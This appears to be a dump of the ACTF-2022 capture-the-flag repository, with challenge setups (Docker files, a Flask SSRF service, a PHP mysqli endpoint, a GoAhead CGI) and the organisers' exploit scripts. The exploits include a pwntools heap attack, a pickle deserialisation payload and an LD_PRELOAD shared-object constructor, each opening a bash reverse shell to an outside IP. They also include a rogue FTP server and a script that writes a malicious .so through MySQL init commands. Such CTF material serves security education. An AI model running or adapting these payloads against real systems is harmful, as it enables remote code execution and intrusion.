/home/ctf/bin && \ 23 | cp /bin/cat /home/ctf/bin 24 | 25 | COPY ./ctf.xinetd /etc/xinetd.d/ctf 26 | COPY ./start.sh /start.sh 27 | RUN echo "Blocked by ctf_xinetd" > /etc/banner_fail 28 | 29 | RUN chmod +x /start.sh 30 | 31 | COPY ./bin/ /home/ctf/ 32 | RUN chown -R root:ctf /home/ctf && \ 33 | chmod -R 750 /home/ctf && \ 34 | chmod 740 /home/ctf/flag 35 | 36 | CMD ["/start.sh"] 37 | 38 | EXPOSE 8888 39 | -------------------------------------------------------------------------------- /pwn/mykvm/attachments/bin/mykvm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/mykvm/attachments/bin/mykvm -------------------------------------------------------------------------------- /pwn/mykvm/attachments/ctf.xinetd: -------------------------------------------------------------------------------- 1 | service ctf 2 | { 3 | disable = no 4 | socket_type = stream 5 | protocol = tcp 6 | wait = no 7 | user = root 8 | type = UNLISTED 9 | port = 8888 10 | bind = 0.0.0.0 11 | server = /home/ctf/mykvm 12 | banner_fail = /etc/banner_fail 13 | # safety options 14 | per_source = 10 # the maximum instances of this service per source IP address 15 | rlimit_cpu = 20 # the maximum number of CPU seconds that the service may use 16 | #rlimit_as = 1024M # the Address Space resource limit for the service 17 | #access_times = 2:00-9:00 12:00-24:00 18 | } 19 | -------------------------------------------------------------------------------- /pwn/mykvm/attachments/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # Add your startup script 3 | 4 | # DO NOT DELETE 5 | /etc/init.d/xinetd start; 6 | sleep infinity; 7 | -------------------------------------------------------------------------------- /pwn/mykvm/exploits/exp.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/mykvm/exploits/exp.bin -------------------------------------------------------------------------------- /pwn/mykvm/exploits/exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | # context.log_level = 'debug' 3 | libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so") 4 | while(1): 5 | # p = process("./mykvm") 6 | p = remote("10.15.196.135", 9999) 7 | 8 | sla = lambda x,y: p.sendlineafter(x,y) 9 | sa = lambda x,y: p.sendafter(x,y) 10 | 11 | 12 | # code = "\xB0\x61\xBA\x17\x02\xEE\xB0\n\xEE\xF4" 13 | with open("./exp.bin", "rb") as f: 14 | code = f.read() 15 | sla("size:", str(len(code))) 16 | # print disasm(code) 17 | 18 | sa("code:", code) 19 | sla("guest name:", "a"*0x28) 20 | sla("guest passwd:", "a"*0x50) 21 | libc_base = u64(p.recvuntil("\x7f")[-6:].ljust(8, '\x00')) - 0x3ea350#0x3c4b78 22 | system_addr = libc_base + 0x44e30 # do_system 23 | log.success("libc_base: "+hex(libc_base)) 24 | log.success("system_addr: "+hex(system_addr)) 25 | if (system_addr >> 0x10) & 0xff == 0x00: 26 | break 27 | 28 | sla("host name:", 'a'*0x2e + p8(system_addr &0xff) + p8((system_addr >> 8) &0xff)) 29 | 30 | p.interactive() 31 | -------------------------------------------------------------------------------- /pwn/mykvm/exploits/readme.txt: -------------------------------------------------------------------------------- 1 | nasm exp.asm -o exp.bin 2 | python exp.py 3 | -------------------------------------------------------------------------------- /pwn/treepwn/attachments/ld-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/treepwn/attachments/ld-2.27.so -------------------------------------------------------------------------------- /pwn/treepwn/attachments/libc-2.27.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/treepwn/attachments/libc-2.27.so -------------------------------------------------------------------------------- /pwn/treepwn/attachments/treepwn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/pwn/treepwn/attachments/treepwn -------------------------------------------------------------------------------- /reverse/FunTiger/attachments/funTiger: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/FunTiger/attachments/funTiger -------------------------------------------------------------------------------- /reverse/Inflated/attachments/inflated: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/Inflated/attachments/inflated -------------------------------------------------------------------------------- /reverse/Nagi_Knows/exploits/solve.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include "nagi.hpp" 3 | 4 | int main() { 5 | std::cout << Nagi::GetFlag() << std::endl; 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /reverse/dropper/attachments/dropper.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/dropper/attachments/dropper.exe -------------------------------------------------------------------------------- /reverse/kcov/attachments/bzImage: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/kcov/attachments/bzImage -------------------------------------------------------------------------------- /reverse/kcov/attachments/launch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | qemu-system-x86_64 \ 4 | -smp 2 \ 5 | -kernel ./bzImage \ 6 | -initrd ./rootfs.cpio.gz \ 7 | -nographic \ 8 | -append "console=ttyS0 quiet oops=panic panic=1 nokaslr" \ 9 | -monitor /dev/null \ 10 | -no-reboot \ 11 | -------------------------------------------------------------------------------- /reverse/kcov/attachments/rootfs.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/reverse/kcov/attachments/rootfs.cpio.gz -------------------------------------------------------------------------------- /web/ToLeSion/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | ports: 7 | - "10023:5000" 8 | restart: on-failure 9 | -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/app.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 - 3 | from flask import Flask, request, redirect 4 | from flask_session import Session 5 | from io import BytesIO 6 | import memcache 7 | import pycurl 8 | import random 9 | import string 10 | 11 | app = Flask(__name__) 12 | app.debug = True 13 | app.secret_key = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(56)) 14 | 15 | app.config['SESSION_TYPE'] = 'memcached' 16 | app.config['SESSION_PERMANENT'] = True 17 | app.config['SESSION_USE_SIGNER'] = False 18 | app.config['SESSION_KEY_PREFIX'] = 'actfSession:' 19 | app.config['SESSION_MEMCACHED'] = memcache.Client(['127.0.0.1:11200']) 20 | 21 | Session(app) 22 | 23 | @app.route('/') 24 | def index(): 25 | buffer=BytesIO() 26 | if request.args.get('url'): 27 | url = request.args.get('url') 28 | c = pycurl.Curl() 29 | c.setopt(c.URL, url) 30 | c.setopt(c.FTP_SKIP_PASV_IP, 0) 31 | c.setopt(c.WRITEDATA, buffer) 32 | blacklist = [c.PROTO_DICT, c.PROTO_FILE, c.PROTO_FTP, c.PROTO_GOPHER, c.PROTO_HTTPS, c.PROTO_IMAP, c.PROTO_IMAPS, c.PROTO_LDAP, c.PROTO_LDAPS, c.PROTO_POP3, c.PROTO_POP3S, c.PROTO_RTMP, c.PROTO_RTSP, c.PROTO_SCP, c.PROTO_SFTP, c.PROTO_SMB, c.PROTO_SMBS, c.PROTO_SMTP, c.PROTO_SMTPS, c.PROTO_TELNET, c.PROTO_TFTP] 33 | allowProtos = c.PROTO_ALL 34 | for proto in blacklist: 35 | allowProtos = allowProtos&~(proto) 36 | c.setopt(c.PROTOCOLS, allowProtos) 37 | c.perform() 38 | c.close() 39 | return buffer.getvalue().decode('utf-8') 40 | else: 41 | return redirect('?url=http://www.baidu.com',code=301) 42 | 43 | if __name__ == '__main__': 44 | app.run(host='0.0.0.0', debug=False) -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8 2 | 3 | RUN sed -i 's/security.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list 4 | RUN sed -i 's/deb.debian.org/mirrors.aliyun.com/g' /etc/apt/sources.list 5 | COPY ./app.py /app.py 6 | COPY ./requirements.txt /requirements.txt 7 | COPY ./flag /flag 8 | COPY ./readflag /readflag 9 | COPY ./start.sh /start.sh 10 | RUN chmod 777 /start.sh 11 | RUN mkdir -p /data/logs 12 | RUN chmod 600 /flag && \ 13 | chmod +s /readflag && \ 14 | apt-get update && \ 15 | apt-get install memcached telnet && \ 16 | adduser flask 17 | USER flask 18 | RUN pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple 19 | EXPOSE 5000 20 | ENTRYPOINT ["/bin/bash", "/start.sh" ] -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/flag: -------------------------------------------------------------------------------- 1 | AAA{test_flag} -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/readflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/ToLeSion/attachments/src/readflag -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/requirements.txt: -------------------------------------------------------------------------------- 1 | redis==4.1.4 2 | flask==2.0.3 3 | flask_session==0.4.0 4 | python-memcached==1.59 5 | pycurl==7.45.1 6 | -------------------------------------------------------------------------------- /web/ToLeSion/attachments/src/start.sh: -------------------------------------------------------------------------------- 1 | memcached -d -m 50 -p 11200 -u root 2 | python3 ./app.py 3 | tail -f /dev/null -------------------------------------------------------------------------------- /web/ToLeSion/exploits/FTPServer.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | 4 | ''' 5 | Usage: python3 exp.py local_port target_ip target_port 6 | target/debug/custom-tls --port 8888 --verbose --certs /root/work/tls-poison/fullchain.crt --key /root/work/tls-poison/private.pem forward 6666 7 | python3 FTPServer.py 6666 127.0.0.1 11200 8 | ''' 9 | 10 | lport = int(sys.argv[1]) 11 | raddr = sys.argv[2].replace('.', ',') 12 | rport = sys.argv[3] 13 | rport = int(rport) 14 | server = socket.socket() 15 | server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 16 | server.bind(('0.0.0.0', lport)) 17 | server.listen() 18 | client, _ = server.accept() 19 | 20 | client.send(b'220 (vsFTPd 3.0.3)\n') 21 | print(client.recv(1024)) 22 | client.send(b'230 Login successful.\n') 23 | print(client.recv(1024)) 24 | client.send(b'220 ok\n') 25 | print(client.recv(1024)) 26 | client.send(b'220 ok\n') 27 | print(client.recv(1024)) 28 | client.send(b'257 "/" is the current directory\n') 29 | print(client.recv(1024)) 30 | client.send(f'227 Entering Passive Mode ({raddr},{rport//256},{rport%256})\n'.encode()) # 默认 php 会使用 EPSV 命令, 这个只能指定端口, 所以我们需要发送两次 227 让 php fallback 到 PASV 模式 31 | print(client.recv(1024)) 32 | client.send(f'227 Entering Passive Mode ({raddr},{rport//256},{rport%256})\n'.encode()) 33 | print(client.recv(1024)) 34 | client.send(b'200 Switching to Binary mode.\n') 35 | print(client.recv(1024)) 36 | client.send(b'125 data connection already open. Transfer starting.\n') 37 | print(client.recv(1024)) 38 | client.send(b'250 Requested file action okay, completed.\n') 39 | print(client.recv(1024)) -------------------------------------------------------------------------------- /web/ToLeSion/exploits/exp.py: -------------------------------------------------------------------------------- 1 | import redis 2 | import pickle,requests 3 | 4 | def get_pickle_payload(cmd): 5 | class AAA(): 6 | def __reduce__(self): 7 | return (__import__('os').system, (cmd,)) 8 | aaa = AAA() 9 | payload = pickle.dumps(aaa) 10 | return payload 11 | 12 | def parse(x): 13 | return b'\r\n' + x + b'\r\n' 14 | 15 | def set(key, value): 16 | return parse(b'set %s 0 0 %d\n%s' % (key.encode(), len(value), value)) 17 | 18 | def rce(): 19 | r = requests.get( 20 | url = 'http://localhost:10023/?url=ftps://ctf.zjusec.top:8888/' 21 | ) 22 | print(r.text) 23 | 24 | r = requests.get( 25 | url = 'http://localhost:10023/?url=file:///etc/passwd', 26 | headers={ 27 | 'Cookie':'session=aaa' 28 | } 29 | ) 30 | print(r.text) 31 | def local_set(): 32 | payload = get_pickle_payload('/bin/bash -c "bash -i >& /dev/tcp/150.158.58.29/7777 0>&1"') 33 | r = redis.StrictRedis(host='localhost', port=6379, db=0) 34 | redis_payload = set('actfSession:aaa', payload) 35 | print(redis_payload) 36 | r.set('payload', redis_payload) 37 | # mc = memcache.Client(['127.0.0.1:11200']) 38 | # print(mc.set('actfSession:aaa', payload)) 39 | 40 | if __name__ == "__main__": 41 | # local_set() 42 | rce() -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | init: true 7 | ports: 8 | - "10022:8000" 9 | restart: on-failure 10 | deploy: 11 | resources: 12 | limits: 13 | cpus: '0.50' 14 | memory: 4096M 15 | mongodb: 16 | build: ./mongodb/ 17 | tty: true 18 | restart: on-failure 19 | deploy: 20 | resources: 21 | limits: 22 | cpus: '0.20' 23 | memory: 1024M -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/mongodb/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM mongo:latest 2 | 3 | COPY start.sh / 4 | RUN chmod 777 /start.sh 5 | ENV password=fakepassword 6 | EXPOSE 27017 7 | ENTRYPOINT ["bash", "/start.sh" ] -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/mongodb/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | nohup mongod --bind_ip_all > /var/log/mongo.txt & 3 | sleep 2 4 | watch -n 1800 "mongo ctf --eval \"db.users.remove({});db.users.insertOne({username:'admin','password':'$password','isAdmin':true})\"" &>/dev/null & 5 | tail -f /dev/null -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:latest 2 | # COPY linux_signing_key.pub /tmp 3 | COPY ./app /app 4 | RUN sed -i 's/security.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list 5 | RUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list 6 | RUN apt-get update && apt-get install chromium -y 7 | RUN export PUPPETEER_SKIP_DOWNLOAD='true' 8 | WORKDIR /app 9 | RUN npm config set loglevel=http 10 | RUN npm config set registry https://registry.npm.taobao.org 11 | RUN npm install 12 | ENV password=fakepassword 13 | EXPOSE 8000 14 | RUN adduser actfer 15 | USER actfer 16 | ENTRYPOINT ["node","/app/app.js"] 17 | -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/admin.js: -------------------------------------------------------------------------------- 1 | const puppeteer = require('puppeteer'); 2 | const process = require('process') 3 | const ADMIN_USERNAME = 'admin' 4 | const ADMIN_PASSWORD = process.env.password 5 | const FLAG = require('./config').FLAG 6 | const view = async(url) => { 7 | const browser = await puppeteer.launch({ 8 | headless: true, 9 | args: ['--no-sandbox', '--disable-setuid-sandbox'] 10 | }) 11 | const page = await browser.newPage() 12 | // page.on('console', msg => console.log(msg.text())) 13 | await page.goto('http://localhost:8000/login') 14 | await page.type("#username", ADMIN_USERNAME) 15 | await page.type("#password", ADMIN_PASSWORD) 16 | await page.click('#btn-login') 17 | // get flag1 18 | await page.goto(url, { timeout: 5000 }) 19 | // get flag2 20 | await page.setJavaScriptEnabled(false) 21 | await page.goto(url, { timeout: 5000 }) 22 | const data = await page.evaluate((url, FLAG) => { 23 | if (fff.lll.aaa.ggg.value == "this_is_what_i_want") { 24 | return fetch(url + '?part2=' + btoa(encodeURIComponent(FLAG.substring(16)))); 25 | } else { 26 | return fetch(url + '?there_is_no_flag') 27 | } 28 | }, url, FLAG) 29 | await browser.close() 30 | } 31 | exports.view = view -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/config.js: -------------------------------------------------------------------------------- 1 | const FLAG = "ACTF{*****************************}" 2 | const FAKE_FLAG = "only_admin_users_can_see_the_true_flag" 3 | exports.FLAG = FLAG 4 | exports.FAKE_FLAG = FAKE_FLAG -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "dependencies": { 3 | "ejs": "^3.1.8", 4 | "express": "^4.18.1", 5 | "express-session": "^1.17.3", 6 | "mongoose": "^6.3.6", 7 | "puppeteer": "^14.3.0", 8 | "puppeteer-core": "^14.3.0", 9 | "string-random": "^0.1.3" 10 | } 11 | } -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/views/login.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | login 5 | 6 | 7 | 8 |
9 |
10 |

11 | 12 |

13 |

14 | 15 |

16 |

17 | 18 |

19 |
20 |
21 | <% if(locals.error) { %> 22 |

<%= error %>

23 | <% } %> 24 |
25 |
26 | 27 | -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/attachments/src/app/views/register.ejs: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | login 5 | 6 | 7 | 8 |
9 |
10 |

11 | 12 |

13 |

14 | 15 |

16 |

17 | 18 |

19 |
20 |
21 | <% if(locals.error) { %> 22 |

<%= error %>

23 | <% } %> 24 |
25 |
26 | 27 | -------------------------------------------------------------------------------- /web/beWhatYouWannaBe/exploits/exploit.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | csrf 5 | 6 | 7 | 8 | 9 | 10 | 11 |
12 | 13 | 14 |
15 | 16 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /web/gogogo/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | ports: 7 | - "10218:8081" 8 | ulimits: 9 | nproc: 64 10 | deploy: 11 | resources: 12 | limits: 13 | cpus: '0.50' 14 | memory: 4096M -------------------------------------------------------------------------------- /web/gogogo/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM debian:buster 2 | 3 | RUN set -ex \ 4 | && apt-get update \ 5 | && apt-get install wget make gcc -y \ 6 | && wget -qO- https://github.com/embedthis/goahead/archive/refs/tags/v5.1.4.tar.gz | tar zx --strip-components 1 -C /usr/src/ \ 7 | && cd /usr/src \ 8 | && make SHOW=1 ME_GOAHEAD_UPLOAD_DIR="'\"/tmp\"'" \ 9 | && make install \ 10 | && cp src/self.key src/self.crt /etc/goahead/ \ 11 | && mkdir -p /var/www/goahead/cgi-bin/ \ 12 | && apt-get purge -y --auto-remove wget make gcc \ 13 | && cd /var/www/goahead \ 14 | && rm -rf /usr/src/ /var/lib/apt/lists/* \ 15 | && sed -e 's!^# route uri=/cgi-bin dir=cgi-bin handler=cgi$!route uri=/cgi-bin dir=/var/www/goahead handler=cgi!' -i /etc/goahead/route.txt 16 | 17 | COPY flag /flag 18 | RUN chmod 644 /flag 19 | COPY hello /var/www/goahead/cgi-bin/hello 20 | RUN chmod +x /var/www/goahead/cgi-bin/hello 21 | 22 | RUN groupadd -r ctf && useradd -r -g ctf ctf 23 | EXPOSE 8081 24 | 25 | USER ctf 26 | CMD ["goahead", "-v", "--home", "/etc/goahead", "/var/www/goahead", "0.0.0.0:8081"] -------------------------------------------------------------------------------- /web/gogogo/attachments/src/flag: -------------------------------------------------------------------------------- 1 | ACTF{test_flag} -------------------------------------------------------------------------------- /web/gogogo/attachments/src/hello: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | echo -e "Content-Type: text/plain\n" 4 | echo -e "Welcome to ACTF!\n" 5 | env -------------------------------------------------------------------------------- /web/gogogo/exploits/exp.py: -------------------------------------------------------------------------------- 1 | import requests, random 2 | from concurrent import futures 3 | from requests_toolbelt import MultipartEncoder 4 | hack_so = open('hack.so','rb').read() 5 | 6 | def upload(url): 7 | m = MultipartEncoder( 8 | fields = { 9 | 'file':('1.txt', hack_so,'application/octet-stream') 10 | } 11 | ) 12 | r = requests.post( 13 | url = url, 14 | data=m, 15 | headers={'Content-Type': m.content_type} 16 | ) 17 | 18 | def include(url): 19 | m = MultipartEncoder( 20 | fields = { 21 | 'LD_PRELOAD': '/proc/self/fd/7', 22 | } 23 | ) 24 | r = requests.post( 25 | url = url, 26 | data=m, 27 | headers={'Content-Type': m.content_type} 28 | ) 29 | 30 | 31 | def race(method): 32 | url = 'http://localhost:10218/cgi-bin/hello' 33 | if method == 'include': 34 | include(url) 35 | else: 36 | upload(url) 37 | 38 | def main(): 39 | task = ['upload','include'] * 1000 40 | random.shuffle(task) # 41 | with futures.ThreadPoolExecutor(max_workers=5) as executor: 42 | results = list(executor.map(race, task)) 43 | 44 | if __name__ == "__main__": 45 | main() -------------------------------------------------------------------------------- /web/gogogo/exploits/hack.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | __attribute__ ((__constructor__)) void aaanb(void) 6 | { 7 | unsetenv("LD_PRELOAD"); 8 | system("touch /tmp/success"); 9 | system("/bin/bash -c 'bash -i >& /dev/tcp/150.158.58.29/7777 0>&1'"); 10 | } 11 | -------------------------------------------------------------------------------- /web/gogogo/exploits/hack.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/gogogo/exploits/hack.so -------------------------------------------------------------------------------- /web/myclient/attachments/check_health.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | if curl -i "http://localhost:10047/index.php" 2>&1 | grep "success" ; 3 | then echo "health" 4 | else date && docker-compose down && docker-compose up -d --build &>/dev/null && date 5 | fi 6 | -------------------------------------------------------------------------------- /web/myclient/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | ports: 7 | - "10047:80" 8 | restart: on-failure 9 | environment: 10 | MYSQL_USER: 'test' 11 | MYSQL_PASS: 'test123456' 12 | ulimits: 13 | nproc: 64 -------------------------------------------------------------------------------- /web/myclient/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:20.04 2 | 3 | ENV DEBIAN_FRONTEND=noninteractive 4 | 5 | RUN sed -i 's/security.ubuntu.com/mirrors.tuna.tsinghua.edu.cn/g' /etc/apt/sources.list 6 | RUN sed -i 's/archive.ubuntu.com/mirrors.tuna.tsinghua.edu.cn/g' /etc/apt/sources.list 7 | 8 | RUN apt-get update 9 | RUN apt-get install -y gcc make openssl wget curl vim libbz2-dev libxml2-dev libjpeg-dev libpng-dev libfreetype6-dev libzip-dev libssl-dev libsqlite3-dev libcurl4-openssl-dev libgmp3-dev libonig-dev libreadline-dev libxslt1-dev libffi-dev libmysqlclient-dev pkg-config apache2-dev apache2 mysql-server 10 | 11 | RUN wget https://www.php.net/distributions/php-7.4.28.tar.gz -O /tmp/php-7.4.28.tar.gz 12 | RUN cd /tmp && tar zxvf php-7.4.28.tar.gz 13 | RUN cd /tmp/php-7.4.28 && ./configure --with-apxs2 --with-mysqli=/usr/bin/mysql_config --with-pdo-mysql=/usr/bin/mysql_config && make -j8 && make install 14 | 15 | RUN echo "\nSetHandler application/x-httpd-php\n" >> /etc/apache2/apache2.conf 16 | RUN echo "\nLoadModule php7_module modules/libphp7.so\n" >> /etc/apache2/apache2.conf 17 | RUN a2dismod mpm_event 18 | RUN a2enmod mpm_prefork 19 | COPY ./files/readflag.c / 20 | COPY ./flag / 21 | COPY ./files/start.sh /start.sh 22 | COPY ./files/my.cnf /etc/my.cnf 23 | COPY ./files/index.php /var/www/html/ 24 | 25 | RUN \ 26 | chown root:root /flag && \ 27 | chmod 600 /flag && \ 28 | gcc /readflag.c -o /readflag && \ 29 | chmod +s /readflag && \ 30 | rm /readflag.c 31 | RUN groupmod -g 1337 www-data -o 32 | RUN groupmod -g 1337 mysql -o 33 | EXPOSE 80 34 | ENTRYPOINT ["bash","/start.sh"] 35 | 36 | 37 | 38 | 39 | 40 | -------------------------------------------------------------------------------- /web/myclient/attachments/src/files/index.php: -------------------------------------------------------------------------------- 1 | 1500){ 6 | die('too long'); 7 | } 8 | if (is_numeric($key) && is_string($value)) { 9 | mysqli_options($con, $key, $value); 10 | } 11 | mysqli_options($con, MYSQLI_OPT_LOCAL_INFILE, 0); 12 | if (!mysqli_real_connect($con, "127.0.0.1", "test", "test123456", "mysql")) { 13 | $content = 'connect failed'; 14 | } else { 15 | $content = 'connect success'; 16 | } 17 | mysqli_close($con); 18 | echo $content; 19 | ?> 20 | -------------------------------------------------------------------------------- /web/myclient/attachments/src/files/my.cnf: -------------------------------------------------------------------------------- 1 | # 2 | # The MySQL database server configuration file. 3 | # 4 | # You can copy this to one of: 5 | # - "/etc/mysql/my.cnf" to set global options, 6 | # - "~/.my.cnf" to set user-specific options. 7 | # 8 | # One can use all long options that the program supports. 9 | # Run program with --help to get a list of available options and with 10 | # --print-defaults to see which it would actually understand and use. 11 | # 12 | # For explanations see 13 | # http://dev.mysql.com/doc/mysql/en/server-system-variables.html 14 | 15 | # 16 | # * IMPORTANT: Additional settings that can override those from this file! 17 | # The files must end with '.cnf', otherwise they'll be ignored. 18 | # 19 | 20 | !includedir /etc/mysql/conf.d/ 21 | !includedir /etc/mysql/mysql.conf.d/ 22 | [mysqld] 23 | secure_file_priv = /tmp/e10adc3949ba59abbe56e057f20f883e -------------------------------------------------------------------------------- /web/myclient/attachments/src/files/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | char flag[256] = {0}; 5 | FILE* fp = fopen("/flag", "r"); 6 | if (!fp) { 7 | perror("fopen"); 8 | return 1; 9 | } 10 | if (fread(flag, 1, 256, fp) < 0) { 11 | perror("fread"); 12 | return 1; 13 | } 14 | puts(flag); 15 | fclose(fp); 16 | return 0; 17 | } -------------------------------------------------------------------------------- /web/myclient/attachments/src/files/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | mkdir /tmp/e10adc3949ba59abbe56e057f20f883e 3 | chmod 1777 /tmp/e10adc3949ba59abbe56e057f20f883e 4 | service mysql stop 5 | usermod -d /var/lib/mysql/ mysql 6 | service mysql start 7 | 8 | watch -n 300 'rm -rf /tmp/e10adc3949ba59abbe56e057f20f883e/*' &>/dev/null & 9 | mysql -u root -e "CREATE USER '$MYSQL_USER'@'%' IDENTIFIED BY '$MYSQL_PASS';"; 10 | mysql -u root -e "GRANT SELECT on mysql.* to '$MYSQL_USER'@'%';FLUSH PRIVILEGES;"; 11 | mysql -u root -e "GRANT FILE on *.* to '$MYSQL_USER'@'%';FLUSH PRIVILEGES;"; 12 | service apache2 start 13 | tail -f /dev/null -------------------------------------------------------------------------------- /web/myclient/attachments/src/flag: -------------------------------------------------------------------------------- 1 | AAA{test_flag} -------------------------------------------------------------------------------- /web/myclient/exploits/exp.py: -------------------------------------------------------------------------------- 1 | import requests, random, string 2 | MYSQLI_INIT_COMMAND = 3 3 | MYSQLI_READ_DEFAULT_FILE = 4 4 | def send(key, value): 5 | r = requests.get( 6 | url = 'http://localhost:10047/index.php', 7 | params = { 8 | 'key': key, 9 | 'value': value 10 | } 11 | ) 12 | print(value) 13 | print(r.text) 14 | 15 | cnf_payload = b"""[client] 16 | init_command = select sleep(3) 17 | plugin_dir = /tmp/e10adc3949ba59abbe56e057f20f883e/ 18 | default_auth = hack 19 | """.hex() 20 | def rce(): 21 | tmp_dir = '/tmp/e10adc3949ba59abbe56e057f20f883e/' 22 | cnf_name = 'aaa.cnf' 23 | # so_name = 'b1856f.phar' 24 | with open('hack.so','rb') as f: 25 | payload = f.read().hex() 26 | 27 | # upload so 28 | block_size = 1000 29 | for i in range(0,len(payload),block_size): 30 | send(MYSQLI_INIT_COMMAND, f'select 0x{payload[i:i+1000]} into dumpfile "{tmp_dir}tmp{i//1000}.so"') 31 | 32 | s = ','.join([f'(select load_file("{tmp_dir}tmp{x}.so"))' for x in range(len(payload) // block_size + 1)]) 33 | send(MYSQLI_INIT_COMMAND, f'select concat({s}) into dumpfile "{tmp_dir}hack.so"') 34 | # upload cnf 35 | send(MYSQLI_INIT_COMMAND, f'select 0x{cnf_payload} into dumpfile "{tmp_dir}{cnf_name}"') 36 | print(f'{tmp_dir}{cnf_name}') 37 | # send(MYSQLI_INIT_COMMAND, 'select sleep(5)') 38 | send(MYSQLI_READ_DEFAULT_FILE, f'{tmp_dir}{cnf_name}') 39 | """ 40 | apt install sudo 41 | mysql --defaults-file=aaa.cnf -u test -p 42 | """ 43 | 44 | if __name__ == "__main__": 45 | rce() -------------------------------------------------------------------------------- /web/myclient/exploits/hack.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/team-s2/ACTF-2022/19be182098f50719c474272b6a2e31c5da15053f/web/myclient/exploits/hack.so -------------------------------------------------------------------------------- /web/poorui/attachments/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.7' 2 | services: 3 | src: 4 | build: ./src/ 5 | tty: true 6 | restart: on-failure 7 | ports: 8 | - "8081:8081" -------------------------------------------------------------------------------- /web/poorui/attachments/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:16 2 | 3 | COPY ./source /app 4 | WORKDIR /app 5 | RUN npm install && npm install pm2 -g 6 | RUN sed -i "s@http://deb.debian.org@http://mirrors.aliyun.com@g" /etc/apt/sources.list && rm -Rf /var/lib/apt/lists/* 7 | RUN apt-get update && apt-get install -y libnss3 libnspr4 libatk1.0-0 libatk-bridge2.0-0 